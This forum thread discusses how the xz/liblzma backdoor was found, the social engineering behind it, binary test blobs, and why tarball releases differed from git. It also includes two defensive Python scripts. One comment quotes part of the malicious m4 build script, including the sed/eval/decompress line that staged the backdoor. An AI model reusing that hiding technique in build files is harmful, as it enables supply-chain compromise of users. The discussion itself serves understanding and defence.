Don't forget all of this was discovered because ssh was running 0.5 seconds slower

It's toooo much bloat. There must be malware XD Linux users at their peak!

Tbf 500ms latency on - IIRC - a loopback network connection in a test environment is a lot. It's not hugely surprising that a curious engineer dug into that.

Especially given that it only took 300ms before and 800ms after

Technically that wasn't the initial entrypoint, paraphrasing from https://mastodon.social/@AndresFreundTec/112180406142695845 :

It started with ssh using an unreasonable amount of CPU, which interfered with benchmarks. Then profiling showed that CPU time being spent in lzma, without being attributable to anything. And he remembered earlier valgrind issues. These valgrind issues only came up because he had set some build flag, and he doesn't even remember anymore why it is set. On top of that, he ran all of this on Debian unstable to catch (unrelated) issues early. Had any of these factors been missing, he wouldn't have caught it. All of this is so nuts.

Is that from the Microsoft engineer or did he start from this observation?

From what I read it was this observation that led him to investigate the cause. But this is the first time I read that he's employed by Microsoft.

I know this is being treated as a social engineering attack, but having unreadable binary blobs as part of your build/dev pipeline is fucking insane.

Is it, really? If the whole point of the library is dealing with binary files, how are you even going to have automated tests of the library?

The scary thing is that there are people still using autotools, or any other hyper-complicated build system in which this is easy to hide, because who the hell cares about learning Makefiles, autoconf, automake, M4 and shell scripting all at once to compile a few C files? I think hiding this in any other build system would definitely have been harder. Check this mess:

    dnl Define somedir_c_make.
    [$1]_c_make=`printf '%s\n' "$[$1]_c" | sed -e "$gl_sed_escape_for_make_1" -e "$gl_sed_escape_for_make_2" | tr -d "$gl_tr_cr"`
    dnl Use the substituted somedir variable, when possible, so that the user
    dnl may adjust somedir a posteriori when there are no special characters.
    if test "$[$1]_c_make" = '\"'"${gl_final_[$1]}"'\"'; then
      [$1]_c_make='\"$([$1])\"'
    fi
    if test "x$gl_am_configmake" != "x"; then
      gl_[$1]_config='sed \"r\n\" $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
    else
      gl_[$1]_config=''
    fi

It's not uncommon to keep example bad data around for regression tests to run against, and I imagine that's not the only example in a compression library, but I'd definitely consider that a level of testing above unit tests, and would not include it in the main repo. Tests that verify behavior at run time, either when interacting with the user, integrating with other software or services, or after being packaged, belong elsewhere. In summary, this is lazy.

As mentioned, binary test files make sense for this utility. In the future though, maintainers should be expected to demonstrate how and why the binary files were constructed the way they were, kinda like how encryption algorithms explain how they derived any arbitrary or magic numbers. This would bring more trust and transparency to these files without having to eliminate them.
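One way to read that suggestion: instead of committing an opaque "bad" file, commit the small script that produces it, so anyone can regenerate the bytes and compare. Below is a minimal sketch in Python, not anything the xz project actually does. The function names, the sample payload, and the choice of offset 20 are all made up for illustration, and the output bytes may differ between liblzma versions, so a real project would pin the tool version as well.

```python
import hashlib
import lzma


def build_corrupt_fixture(payload: bytes, flip_offset: int) -> bytes:
    """Compress payload as .xz, then invert one byte to corrupt the stream.

    Both inputs are plain, reviewable values, so the resulting "binary blob"
    can be regenerated instead of being trusted as-is.
    """
    good = lzma.compress(payload, format=lzma.FORMAT_XZ, preset=6)
    bad = bytearray(good)
    bad[flip_offset] ^= 0xFF  # deliberately damage exactly one byte
    return bytes(bad)


def fixture_digest(data: bytes) -> str:
    """SHA-256 of the fixture, suitable for recording next to the script."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    # Hypothetical payload and offset, chosen only for this example.
    fixture = build_corrupt_fixture(b"hello, regression test\n" * 64, flip_offset=20)
    print(len(fixture), fixture_digest(fixture))
    try:
        lzma.decompress(fixture)
    except lzma.LZMAError as exc:
        print("decoder rejected the fixture, as intended:", exc)
```

A reviewer can then check two things: that the script is short enough to read, and that running it reproduces the digest recorded in the repo.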

Thank you open source for the transparency.

This is informative, but unfortunately it doesn't explain how the actual payload works - how does it compromise SSH exactly?

It allows a patched SSH client to bypass SSH authentication and gain access to a compromised computer

From what I've heard so far, it's NOT an authentication bypass, but a gated remote code execution.

There's some discussion on that here: https://bsky.app/profile/filippo.abyssdomain.expert/post/3kowjkx2njy2b

But it would be nice to have a similar diagram like OP's to understand how exactly it does the RCE and implements the SSH backdoor. If we understand how, maybe we can take measures to prevent similar exploits in the future.

I think ideas about prevention should be more concerned with the social engineering aspect of this attack. The code itself is certainly cleverly hidden, but any bad actor who gains the kind of access Jia had could likely pull off something similar without duplicating their specific method or technique.

If this was done by multiple people, I'm sure the person that designed this delivery mechanism is really annoyed with the person that made the sloppy payload, since that made it all get detected right away.

I hope they are all extremely annoyed and frustrated

I like to imagine this was thought up by some ambitious product manager who enthusiastically pitched this idea during their first week on the job.

Then they carefully and meticulously implemented their plan over 3 years, always promising the executives it would be a huge pay off. Then the product manager saw the writing on the wall that this project was gonna fail. Then they bailed while they could and got a better position at a different company.

The new product manager overseeing this project didn't care about it at all. New PM said fuck it and shipped the exploit before it was ready so the team could focus their work on a new project that would make new PM look good.

The new project will be ready in just 6-12 months, and it is totally going to disrupt the industry!

I see a dark room of shady, hoody-wearing, code-projected-on-their-faces, typing-on-two-keyboards-at-once 90's movie style hackers. The tables are littered with empty energy drink cans and empty pill bottles.

A man walks in. Smoking a thin cigarette, covered in tattoos and dressed in the flashiest interpretation of "Yakuza Gangster" imaginable, he grunts with disgust and mutters something in Japanese as he throws the cigarette to the floor, grinding it into the carpet with his thousand dollar shoes.

Flipping on the lights with an angry flourish, he yells at the room to gather for standup.

I have been reading about this since the news broke and still can't fully wrap my head around how it works. What an impressive level of sophistication.

And due to open source, it was still caught within a month. Nothing could ever convince me more of how secure FOSS can be.

Idk if that's the right takeaway, more like 'oh shit there's probably many of these long con contributors out there, and we just happened to catch this one because it was a little sloppy due to the 0.5s thing'

This shit got merged. Binary blobs and hex digit replacements. Into low level code that many things use. Just imagine how often there's no oversight at all

Yes, and since the moment this broke, other project maintainers have been working on finding exploits. They read the same news we do and have those same concerns.

Very generous to imagine that maintainers have so much time on their hands

I was literally compiling this library a few nights ago and didn't catch shit. We caught this one, but I'm sure there's a bunch of "bugs" we've squashed over the years, long after they were introduced, that were working just as intended like this one.

The real scary thing to me is the notion this was state sponsored and how many things like this might be hanging out in proprietary software for years on end.

I think going forward we need to look at packages with a single or few maintainers as target candidates. Especially if they are as widespread as this one was.

In addition I think security needs to be a higher priority too, no more patching fuzzers to allow that one program to compile. Fix the program.

I'd also love to see systems hardened by default.

In the words of the devs in that security email, and I'm paraphrasing -

"Lots of people giving next steps, not a lot of people lending a hand."

I say this as a person not lending a hand. This stuff is over my head and outside my industry knowledge and experience, even after I spent the whole weekend piecing everything together.

Packages or dependencies with only one maintainer that are this popular have always been an issue, and not just a security one.

What happens when that person can't afford to or doesn't want to run the project anymore? What if they become malicious? What if they sell out? Etc.

A small blurb from The Guardian on why Andres Freund went looking in the first place.

So how was it spotted? A single Microsoft developer was annoyed that a system was running slowly. That’s it. The developer, Andres Freund, was trying to uncover why a system running a beta version of Debian, a Linux distribution, was lagging when making encrypted connections. That lag was all of half a second, for logins. That’s it: before, it took Freund 0.3s to login, and after, it took 0.8s. That annoyance was enough to cause him to break out the metaphorical spanner and pull his system apart to find the cause of the problem.

The scary thing about this is thinking about potential undetected backdoors similar to this existing in the wild. Hopefully the lessons learned from the xz backdoor will help us to prevent similar backdoors in the future.

I have heard multiple times from different sources that building from git source instead of using tarballs invalidates this exploit, but I do not understand how. Is anyone able to explain that?

If malicious code is in the source, and therefore in the tarball, what's the difference?



Because m4/build-to-host.m4, the entry point, is not in the git repo, but was included by the malicious maintainer into the tarballs.
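To make that concrete, here is a rough Python sketch of how someone could list files that exist in a release tarball but not in the git tree. The function names and the paths in the usage note are hypothetical, and it assumes the tarball wraps everything in a single top-level directory (as `xz-5.6.1/...` style tarballs usually do). Note that autotools tarballs legitimately ship generated files such as `configure` that are not in git, so the output is a list of things to review, not a verdict.

```python
import subprocess
import tarfile
from pathlib import PurePosixPath


def tarball_files(tar_path: str) -> set[str]:
    """Regular files in the tarball, with the top-level directory stripped."""
    names = set()
    with tarfile.open(tar_path) as tar:
        for member in tar.getmembers():
            if member.isfile():
                parts = PurePosixPath(member.name).parts[1:]
                if parts:
                    names.add("/".join(parts))
    return names


def git_tracked_files(repo_dir: str, ref: str = "HEAD") -> set[str]:
    """Files tracked by git at the given ref (NUL-separated to avoid quoting)."""
    result = subprocess.run(
        ["git", "-C", repo_dir, "ls-tree", "-r", "--name-only", "-z", ref],
        check=True,
        capture_output=True,
        text=True,
    )
    return {name for name in result.stdout.split("\0") if name}


def only_in_tarball(tar_names: set[str], git_names: set[str]) -> list[str]:
    """Sorted list of paths shipped in the tarball but absent from git."""
    return sorted(set(tar_names) - set(git_names))
```

Usage would look something like `only_in_tarball(tarball_files("release.tar.gz"), git_tracked_files("path/to/checkout", "v1.2.3"))`, with both arguments pointing at the same release. In the xz case, `m4/build-to-host.m4` would have shown up in that list, buried among the legitimately generated files.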